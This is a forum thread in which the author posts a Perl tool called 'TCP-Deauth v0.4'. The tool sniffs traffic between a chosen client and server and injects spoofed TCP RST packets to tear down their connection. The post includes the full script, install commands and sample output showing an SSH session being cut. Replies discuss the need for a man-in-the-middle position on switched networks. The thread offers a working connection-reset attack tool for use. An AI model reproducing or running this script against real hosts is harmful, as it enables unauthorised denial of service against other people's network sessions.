TCP-Deauth v0.4

Hi. I write this small Perl script during my researh on the TCP/IP protocol. It disconnect a host from a server, all is in the usage.

Code:

---

#!/usr/bin/perl

use Net::RawIP;

print "[TCP-Deauth v0.4] Exploit by azert0x\n"."=" x 36 ."\n"; ($eth, $cip, $sip, $sport) = @ARGV;
die "Usage: ./$0 [interface] [client ip] [server ip] [server port]\n" if @ARGV < 3;
$n = Net::RawIP->new; print "Waiting for specified network traffic...\n";
$p = $n->pcapinit($eth, "tcp and src host $sip and dst host $cip and dst port $sport", 1500, 30);
loop($p, 1, \&tcprst, 0); print "> TCP-Deauth Exploit Done :)\n";

sub tcprst {
  $n->bset(substr $_[2], 14); my ($cport, $ack_seq, $seq) = $n->get({tcp => [qw(source ack_seq seq)]});
  $n->set({ip => {saddr => $cip, daddr => $sip}, tcp => {source => $cport, dest => $sport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
  print "Sending Spoofed RST to $sip:$sport with Acknum $ack_seq and Seqnum $seq\n"; $n->send;
  $n->set({ip => {saddr => $sip, daddr => $cip}, tcp => {source => $sport, dest => $cport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
  print "Sending Spoofed RST to $cip:$cport with Acknum $ack_seq and Seqnum $seq\n"; $n->send;
}

# azert0x first sploit.
# Thanks to Perl Underground!

---

----------------------------------

On BackTrack4 the CPAN Perl module Net::RawIP do a segfault, so:

$ sudo perl -MCPAN -e "install Net::RawIP"

and after compilation and (re)installation it works great. Then, run the script as it and you'll see the usage.

$ sudo perl deauth.pl

My script spy the specified client and server network traffic, get the values of ack_seq & seq flags and send to the server, with them, a network packet with the RST flags activate (this RST packet masquerade as the client). If the connection is in ETABLISHED state, my script re-send another RST packet to the client (this RST packet masquerade as the server).

You must obviously be able to sniff the traffic between the targets for my tool works (you should have understood from reading above).

It works in various network environments, not only in localhost!
But if you work in localhost (127.0.0.1), specify "lo" as network interface.

For example: i've a localhost SSH server and i'm connected to it. I run my Perl script, it waits for network traffic. When i press a key on my SSH shell, i'm disconnected.

azert0x@bt4:~$ sudo perl deauth.pl lo 127.0.0.1 127.0.0.1 22
[TCP-Deauth v0.4] Exploit by azert0x
============================
Waiting for specified network traffic...
Sending Spoofed RST to 127.0.0.1:22 with Acknum -131693645 and Seqnum -123819417...
Sending Spoofed RST to 127.0.0.1:60295 with Acknum -131693645 and Seqnum -123819417...
> TCP-Deauth Exploit Done :)

I'll update it soon, so please, if you have any problems, bugs or ideas about it, tell them to me. Then gladly i'll work on improvement.

One of my favourite links on the topic, may be useful to you in terms of where to go from here:

Programming TCP Hijacking Tools in Perl

I'd also like to see how you plan to break the TCP connection if, for example, you have server(192.168.1.1), client(192.168.1.2) and attacker(192.168.1.3), and perhaps some documentation on how/why this works, and possible workarounds for it.

Other than that the script is cleanish and simple for anyone who wants to have a read through, with enough explanations on the datenterrorist link to get you through if you need the help.

Thanks for the link, i don't know it, and for your advices.

Quote:

---

Originally Posted by Gitsnik

I'd also like to see how you plan to break the TCP connection if, for example, you have server(192.168.1.1), client(192.168.1.2) and attacker(192.168.1.3), and perhaps some documentation on how/why this works, and possible workarounds for it.

---

My little Perl script works great in the environment that you have suggested: server(192.168.1.1), client(192.168.1.2) and attacker(192.168.1.3). Try it.

I use Net::RawIP because it is sufficient. We need nothing more to do it. I agree with you, it's the bare minimum, but it does what i explain.

If you want more informations or documentation, see my website.

From what I gather, you need to be able to sniff the traffic between the client/server in order to execute this exploit?

Yes, it's why i only used Net::RawIP, which is given with all minimal Perl installation. This increases portability.

Quote:

---

Originally Posted by azert0x

Yes, it's why i only used Net::RawIP CPAN module, which is given with all minimal Perl installation.

---

And how do you expect to get all this traffic on a switched network with only the "tcp and src $sip and dst $cip etc." filter?

That same filter should be applied to tcpdump to see how if it works at picking up all network traffic - It does not unless I slap everything into a hub and run them from there (or MiTM the lot). This is switching-network-traffic-101. If it was as easy as firing up tcpdump we'd never have come up with the masses of MiTM tools we have.

Quote:

---

Originally Posted by Gitsnik

And how do you expect to get all this traffic on a switched network with only the "tcp and src $sip and dst $cip etc." filter?

---

It is for you to do MITM attacks or "slap everything Into a hub" before using TCP-Deauth. As i said: you must obviously be able to sniff the traffic between the targets for my tool works...

The Pcap Filter is correct and i tried it before using (you can change it if not to your liking, but you'll have to adapt the script for you).